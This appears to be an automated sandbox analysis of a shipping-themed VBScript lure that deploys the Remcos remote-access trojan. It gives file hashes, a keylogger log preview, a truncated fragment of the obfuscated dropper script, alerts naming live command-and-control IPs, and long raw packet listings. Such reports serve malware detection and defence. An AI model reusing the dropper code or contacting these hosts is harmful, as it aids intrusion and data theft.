                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x06159722, page size 32768, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):17301504
                                            Entropy (8bit):0.7857334108338626
                                            Encrypted:false
                                            SSDEEP:6144:qdfjZb5aXEY2waXEY24URlMe2APXAP5APzAP/Ou8pHAPFJnTJnpbn+otnBQ+hR0D:oVU4e8KyXaKKjcrONseWY
                                            MD5:3624288A152C9DE331BD960C3201D13E
                                            SHA1:1E20F8C5961DFCDB7F3F56F14230067ED23BA756
                                            SHA-256:51DDE2819D66C0BAF35567BD5C6F2044AD85D7C7C49C6ED68F2B6E5788E97E7C
                                            SHA-512:50246CD427266CD348A5D330DA8A09AF7AA7730C948971005F88290B84A40CF1CDBCAF748850DC7422C91AE4881230A41755204E70191A36F04FB1EB02C4F8C3
                                            Malicious:false
                                            Process:C:\Windows\SysWOW64\clip.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                            Category:dropped
                                            Size (bytes):196608
                                            Entropy (8bit):1.121297215059106
                                            Encrypted:false
                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                            Malicious:false
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                            Category:dropped
                                            Size (bytes):2
                                            Entropy (8bit):1.0
                                            Encrypted:false
                                            SSDEEP:3:Qn:Qn
                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                            Malicious:false
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):454784
                                            Entropy (8bit):5.968090988493347
                                            Encrypted:false
                                            SSDEEP:6144:fzFkw87Vb0haEK76Lx6YmPyBNMj8L3sXnsi+vVSWegdiJxgRL2qcQlRd2eN8VNK6:rFAScSyXnX4VZPo62qcQfIrKEf
                                            MD5:82C97A7D5E458BD3D08271224A2B6ECF
                                            SHA1:AA6715666D0DF4EA855B905619D9EBBCF3AA06E8
                                            SHA-256:F07FD6C5282995B1EA8403EEA90EBA41749EF50EB6AE50DC3238DF7C0780BEE4
                                            SHA-512:C2BB089A7A132E5A81C70869A2BE0FCC164E236D908F42F9DD9FD453632333CE33945D44089E910283F2B04A2B14FB6D8729D45129E9EA3936BF28AE4BC065B8
                                            Malicious:false
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):465652
                                            Entropy (8bit):5.966380921856515
                                            Encrypted:false
                                            SSDEEP:12288:4YSOPSqx7DEgZRwC8inhPOeWvZeAbccV+:U8pZaC7nhGHwfE+
                                            MD5:C5A7A07491D572F6DB1512405C42FEC6
                                            SHA1:9AEBC59138DC1135BF89215D507A5AB10ADDE6D2
                                            SHA-256:4E05AAAE11AB146CCFC4C25EDE0524F31DC7CEA5DF170B563208EB0402E8E0BC
                                            SHA-512:8E242E9CCFB5C75845A569B26BA3DE11F2E74A56F61F4EBABFB4322FE7E7AB0F7C6A11FF26DA9B9F3AFD4CE11FC7CD83BF527D1E79428D4F5B09C85119428761
                                            Malicious:false
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1240
                                            Entropy (8bit):3.3559150808481397
                                            Encrypted:false
                                            SSDEEP:24:66cmhWqU6aWqUAGAlWqUASAYWqUkqWqURy8RIXRGG1vWtm1zW+:hcYWZWiWbWXWXySIBGGtWYRW+
                                            MD5:A4ABCD2F54829986CAA70C38BBD1099D
                                            SHA1:C32DBB06D14492224310B5CE4DA9E1A342ABFB53
                                            SHA-256:747DB831A3D8395C1786A9569EB8A775720D2C77792120D363CC24A54EC4EE3F
                                            SHA-512:E6469C09A61F738A67C7CD3BF26994A12B34BA8F52F416313ADB0E7EBB3BFED0306CACDC8EE6A325E4664884CA5CBD07B72BF7DB116E1497D7403A4A34AF34B0
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mvourhjs.dat, Author: Joe Security
                                            Preview:[2024/04/26 07:40:38 Offline Keylogger Started] [2024/04/26 07:40:38 Program Manager] [Win]r [2024/04/26 07:40:41 Run] [2024/04/26 07:40:44 Program Manager] [Win]r [2024/04/26 07:41:16 Run] [2024/04/26 07:41:23 Program Manager] [Win]r [2024/04/26 07:41:30 Run] [2024/04/26 07:41:40 Program Manager] [Win]r [2024/04/26 07:42:32 Run] [2024/04/26 09:11:46 Program Manager] [Win]r [2024/04/27 19:22:15 Run] [2024/04/27 19:26:29 File Explorer] [2024/04/27 19:27:01 Contact
                                            File type:ASCII text, with very long lines (338), with CRLF line terminators
                                            Entropy (8bit):5.172522257863658
                                            TrID:
                                              File name:DHL_ES567436735845755676678877988975877.vbs
                                              File size:8'928 bytes
                                              MD5:d0d8e78e99c4c59061e7caa5d254e8e9
                                              SHA1:f06eff42be48b3ff12d8597fc4a155a293ed4236
                                              SHA256:0895ad5d19828edc6d17054edb6d9eebdec60e587167716f2271bd683290aaf8
                                              SHA512:32541443ea184311f837a8f9e03d3c7bed2190d577309909482908bf32ee4552e2868ab413601c7ee3f555fe43a6687d7e5b7a88cc23a7c5d88f3710c937dd31
                                              SSDEEP:192:CXa/1TKd7tWSdiIJ+qdNkV8pH6QM562IfDkyjFzx:CX21aIKvu8pHFt2chjVx
                                              TLSH:6C02C558B8AB8D338D9F0991F597CA50AF1198CCEF8A05573246C3DF10BF584AB16C9D
                                              File Content Preview:........Set Odalborn = CreateObject("Scripting.FileSystemObject")......Stikbrevs = Odalborn.OpenTextFile("C:\windows\notepad.exe", 1).ReadAll....Konsekvensndringernes = instr(1,Stikbrevs,"u")......Set Kakerlakker = CreateObject("WScript.Shell")....Ttte =
                                              Icon Hash:68d69b8f86ab9a86
                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              04/26/24-07:40:40.590604 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 3050 | 49715 | 45.88.90.110 | 192.168.2.5
                                              04/26/24-07:40:40.309700 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49715 | 3050 | 192.168.2.5 | 45.88.90.110
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Apr 26, 2024 07:39:57.820595980 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.820954084 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.821021080 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.821605921 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.821666956 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.822211027 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.822299957 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.822850943 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.822916031 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.823319912 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.823390007 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.823786974 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.823884010 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.824285030 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.824373960 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.824690104 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.824758053 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.825077057 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.825145006 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.825491905 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.825572968 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.856549978 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.856635094 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.856847048 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.856934071 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.897969007 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.898108006 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.898364067 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.898444891 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.898778915 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.898854017 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:57.956743002 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:57.956868887 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.082340956 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.082493067 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.082499027 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.082529068 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.082565069 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.082587957 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.082669020 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.082736969 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.082875967 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.082953930 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.083333015 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.083404064 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.083610058 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.083681107 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.084080935 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.084161997 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.084656000 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.084729910 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.084887028 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.084953070 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.085001945 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.085061073 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.085068941 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.085155964 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:58.085201979 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:58.086947918 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:40:35.172152042 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:35.172195911 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:35.172275066 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:35.181736946 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:35.181770086 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:35.944004059 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:35.944152117 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.007168055 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.007215977 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:36.007524967 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:36.011102915 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.013464928 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.056123972 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:36.265605927 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:36.265691996 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.265755892 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:36.265798092 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:36.265858889 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.265893936 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.268939018 CEST49713443192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.268975019 CEST4434971346.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:36.662606955 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.912484884 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:36.912792921 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:36.912987947 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.162775993 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.165999889 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166047096 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166091919 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166106939 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166106939 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166131973 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166147947 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166172028 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166189909 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166210890 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166220903 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166250944 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166255951 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166289091 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166292906 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166328907 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166332006 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166368008 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.166378975 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.166413069 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416367054 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416424036 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416465044 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416507006 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416544914 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416563034 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416563034 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416563034 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416563034 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416584015 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416600943 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416624069 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416637897 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416659117 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416662931 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416701078 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416706085 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416742086 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416744947 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416780949 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416791916 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416820049 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416831017 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416865110 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416873932 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416913033 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416913986 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.416958094 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.416969061 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.417006969 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.417017937 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.417046070 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.417052984 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.417084932 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.417097092 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.417124033 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.417133093 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.417162895 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.417172909 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.417212009 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667026997 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667088032 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667109013 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667129993 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667136908 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667176962 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667176962 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667221069 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667224884 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667264938 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667267084 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667308092 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667308092 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667349100 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667356014 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667390108 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667396069 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667433023 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667438030 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667471886 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667475939 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667512894 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667517900 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667553902 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667552948 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667593956 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667596102 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667638063 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667644024 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667675972 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667679071 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667721033 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667732954 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667762041 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667781115 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667804956 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667818069 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667850018 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667865992 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667903900 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667913914 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667944908 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667954922 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.667983055 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.667984962 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668020010 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668023109 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668062925 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668066025 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668106079 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668121099 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668162107 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668163061 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668204069 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668210030 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668243885 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668287992 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668328047 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668354988 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668366909 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668369055 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668406963 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668407917 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668446064 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668450117 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668487072 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668605089 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668653011 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668680906 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668723106 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668732882 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668760061 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668797970 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668848038 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668917894 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668956995 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.668957949 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.668998003 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.918766022 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.918818951 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.918860912 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.918888092 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.918915987 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.918916941 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.918924093 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.918957949 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.918966055 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.918997049 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.919011116 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.919042110 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.919099092 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.919138908 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.919150114 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.919178009 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.919182062 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.919222116 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.919322014 CEST804971446.254.34.12192.168.2.5
